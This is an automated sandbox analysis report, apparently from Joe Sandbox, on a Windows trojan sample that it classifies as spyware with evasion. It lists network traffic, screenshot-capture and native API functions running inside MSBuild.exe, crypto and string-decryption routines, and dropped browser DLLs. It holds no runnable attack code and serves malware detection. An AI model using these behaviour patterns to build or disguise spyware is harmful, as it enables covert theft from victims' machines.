Source: unknown Network traffic detected: HTTP traffic on port 51533 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51556 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51380 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51485 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51375
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51496
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51376
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51497
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51373
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51494
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51374
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51495
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51379
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51377
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51498
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51378
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51499
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51382
Source: unknown Network traffic detected: HTTP traffic on port 51324 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51383
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51380
Source: unknown Network traffic detected: HTTP traffic on port 51496 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51381
Source: unknown Network traffic detected: HTTP traffic on port 51406 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51356 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51333 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51379 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51310 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51522 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51459 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51494 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51471 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51436 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51413 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51391 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51539 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51309 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51540 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51322 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51368 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51551 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51425 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51509 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51367 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51510 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51483 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51495 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51447 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51311 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51424 -> 443
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:51295 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:51299 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:51376 version: TLS 1.2
Contains functionality to record screenshots
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00411F2A CreateStreamOnHGlobal,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GetHGlobalFromStream,GlobalLock,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow, 1_2_00411F2A
Contains functionality to call native functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0040145B GetCurrentProcess,NtQueryInformationProcess, 1_2_0040145B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB7ED10 malloc,NtFlushVirtualMemory,memset,memset,memset,memset,memset,memcpy,free,memset,memset,memcpy,memset,memset,memset,memset,memset, 1_2_6CB7ED10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CBBB700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 1_2_6CBBB700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CBBB8C0 rand_s,NtQueryVirtualMemory, 1_2_6CBBB8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CBBB910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 1_2_6CBBB910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB5F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 1_2_6CB5F280
Detected potential crypto function
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00DB2021 0_2_00DB2021
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00DB729C 0_2_00DB729C
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00E0A22B 0_2_00E0A22B
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00DFE3DF 0_2_00DFE3DF
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00DCD39B 0_2_00DCD39B
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00DF94DB 0_2_00DF94DB
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00E0A5C9 0_2_00E0A5C9
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00DF6570 0_2_00DF6570
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00DF877B 0_2_00DF877B
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00DC572C 0_2_00DC572C
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00E0A99B 0_2_00E0A99B
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00DBCAF2 0_2_00DBCAF2
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00DCBB36 0_2_00DCBB36
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00DC3C92 0_2_00DC3C92
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00E0AD83 0_2_00E0AD83
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00E09D96 0_2_00E09D96
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00DB1D79 0_2_00DB1D79
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: 0_2_00DBFEF0 0_2_00DBFEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0041C603 1_2_0041C603
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0041B8A3 1_2_0041B8A3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0042DAC3 1_2_0042DAC3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0042D353 1_2_0042D353
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0042D6F1 1_2_0042D6F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_00419698 1_2_00419698
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0042DEAB 1_2_0042DEAB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_0042CEBE 1_2_0042CEBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB535A0 1_2_6CB535A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CBB34A0 1_2_6CBB34A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CBBC4A0 1_2_6CBBC4A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB66C80 1_2_6CB66C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB96CF0 1_2_6CB96CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB5D4E0 1_2_6CB5D4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB7D4D0 1_2_6CB7D4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB664C0 1_2_6CB664C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CBC542B 1_2_6CBC542B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB95C10 1_2_6CB95C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CBA2C10 1_2_6CBA2C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CBCAC00 1_2_6CBCAC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CBC545C 1_2_6CBC545C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB65440 1_2_6CB65440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CBB85F0 1_2_6CBB85F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB90DD0 1_2_6CB90DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB7ED10 1_2_6CB7ED10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB80512 1_2_6CB80512
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB6FD00 1_2_6CB6FD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CBB4EA0 1_2_6CBB4EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB75E90 1_2_6CB75E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CBBE680 1_2_6CBBE680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB5BEF0 1_2_6CB5BEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB6FEF0 1_2_6CB6FEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CBC76E3 1_2_6CBC76E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CBB9E30 1_2_6CBB9E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB97E10 1_2_6CB97E10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CBA5600 1_2_6CBA5600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB5C670 1_2_6CB5C670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CBC6E63 1_2_6CBC6E63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB79E50 1_2_6CB79E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB93E50 1_2_6CB93E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CBA2E4E 1_2_6CBA2E4E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB74640 1_2_6CB74640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CBA77A0 1_2_6CBA77A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB86FF0 1_2_6CB86FF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB5DFE0 1_2_6CB5DFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB97710 1_2_6CB97710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB69F00 1_2_6CB69F00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB860A0 1_2_6CB860A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB7C0E0 1_2_6CB7C0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB958E0 1_2_6CB958E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CBC50C7 1_2_6CBC50C7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB9B820 1_2_6CB9B820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CBA4820 1_2_6CBA4820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB67810 1_2_6CB67810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB9F070 1_2_6CB9F070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB78850 1_2_6CB78850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB7D850 1_2_6CB7D850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB8D9B0 1_2_6CB8D9B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB5C9A0 1_2_6CB5C9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB95190 1_2_6CB95190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CBB2990 1_2_6CBB2990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CBAB970 1_2_6CBAB970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CBCB170 1_2_6CBCB170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB6D960 1_2_6CB6D960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB7A940 1_2_6CB7A940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB6CAB0 1_2_6CB6CAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CBC2AB0 1_2_6CBC2AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB522A0 1_2_6CB522A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB84AA0 1_2_6CB84AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CBCBA90 1_2_6CBCBA90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB71AF0 1_2_6CB71AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB9E2F0 1_2_6CB9E2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB98AC0 1_2_6CB98AC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB99A60 1_2_6CB99A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB5F380 1_2_6CB5F380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CBC53C8 1_2_6CBC53C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB9D320 1_2_6CB9D320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB6C370 1_2_6CB6C370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CB55340 1_2_6CB55340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CC5ECD0 1_2_6CC5ECD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CBFECC0 1_2_6CBFECC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CC0AC60 1_2_6CC0AC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CCC6C00 1_2_6CCC6C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CCDAC30 1_2_6CCDAC30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CD8CDC0 1_2_6CD8CDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CC96D90 1_2_6CC96D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CC04DB0 1_2_6CC04DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CD2AD50 1_2_6CD2AD50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CCCED70 1_2_6CCCED70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CD88D20 1_2_6CD88D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CC0AEC0 1_2_6CC0AEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CCA0EC0 1_2_6CCA0EC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CC86E90 1_2_6CC86E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CC9EE70 1_2_6CC9EE70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CCE0E20 1_2_6CCE0E20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CC00FE0 1_2_6CC00FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CCDEFF0 1_2_6CCDEFF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CD48FB0 1_2_6CD48FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CC0EFB0 1_2_6CC0EFB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CC6EF40 1_2_6CC6EF40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CCC2F70 1_2_6CCC2F70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CC06F10 1_2_6CC06F10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CD40F20 1_2_6CD40F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CCEC8C0 1_2_6CCEC8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CD068E0 1_2_6CD068E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CD0E850 1_2_6CD0E850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CCD4840 1_2_6CCD4840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CC50820 1_2_6CC50820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CC8A820 1_2_6CC8A820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CD1C9E0 1_2_6CD1C9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CC349F0 1_2_6CC349F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CC909A0 1_2_6CC909A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CCBA9A0 1_2_6CCBA9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CCC09B0 1_2_6CCC09B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CC38960 1_2_6CC38960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CC56900 1_2_6CC56900
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_001B2021 8_2_001B2021
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_001E2088 8_2_001E2088
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_001E40C8 8_2_001E40C8
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_0020E132 8_2_0020E132
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_001E2123 8_2_001E2123
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_0020E1A8 8_2_0020E1A8
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_001DE1CF 8_2_001DE1CF
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_001E8278 8_2_001E8278
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_001DE27B 8_2_001DE27B
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_001DE272 8_2_001DE272
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_001DE455 8_2_001DE455
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_001E0488 8_2_001E0488
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_001DE527 8_2_001DE527
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_0020E738 8_2_0020E738
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_00218798 8_2_00218798
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_00224988 8_2_00224988
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_001FAA47 8_2_001FAA47
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_001E4AC8 8_2_001E4AC8
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_001BCAF2 8_2_001BCAF2
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_001E6D40 8_2_001E6D40
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_001E8D88 8_2_001E8D88
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_0020AD84 8_2_0020AD84
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_00224E98 8_2_00224E98
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_001EEF08 8_2_001EEF08
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_00220F18 8_2_00220F18
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_00226FA8 8_2_00226FA8
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_001EB078 8_2_001EB078
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_002151A8 8_2_002151A8
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_001E71D8 8_2_001E71D8
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_001B729C 8_2_001B729C
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_001CD39B 8_2_001CD39B
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_002133C8 8_2_002133C8
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_001F94C8 8_2_001F94C8
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_001C572C 8_2_001C572C
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_0021B778 8_2_0021B778
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_00221918 8_2_00221918
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_001CBB36 8_2_001CBB36
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_00209BA8 8_2_00209BA8
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_001C3C92 8_2_001C3C92
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_001B1D79 8_2_001B1D79
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_001E7DE8 8_2_001E7DE8
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_001DDED8 8_2_001DDED8
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 8_2_001BFEF0 8_2_001BFEF0
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
Found potential string decryption / allocating functions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 004047E8 appears 38 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 6CB994D0 appears 90 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 6CD809D0 appears 89 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 004104BC appears 37 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 004105DE appears 71 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: String function: 6CB8CBE8 appears 134 times
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: String function: 001B7B80 appears 49 times
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: String function: 001FA1D8 appears 152 times
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: String function: 001E9978 appears 93 times
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Code function: String function: 00DB7B80 appears 49 times
One or more processes crash
Source: C:\Users\user\Desktop\T2bmenoX1o.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7284 -s 272
Sample file is different than original file name gathered from version info
Source: T2bmenoX1o.exe, 00000000.00000002.1811329815.0000000000E40000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameproquota.exej% vs T2bmenoX1o.exe
Source: T2bmenoX1o.exe Binary or memory string: OriginalFilenameproquota.exej% vs T2bmenoX1o.exe
Uses 32bit PE files
Source: T2bmenoX1o.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: T2bmenoX1o.exe Static PE information: Section: .data ZLIB complexity 0.9919220753205128
Source: AAFIIJDAAA.exe.1.dr Static PE information: Section: .data ZLIB complexity 0.9912177666083916
Source: a43486128347[1].exe.1.dr Static PE information: Section: .data ZLIB complexity 0.9912177666083916
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@14/37@13/5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 1_2_6CBB7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree, 1_2_6CBB7030
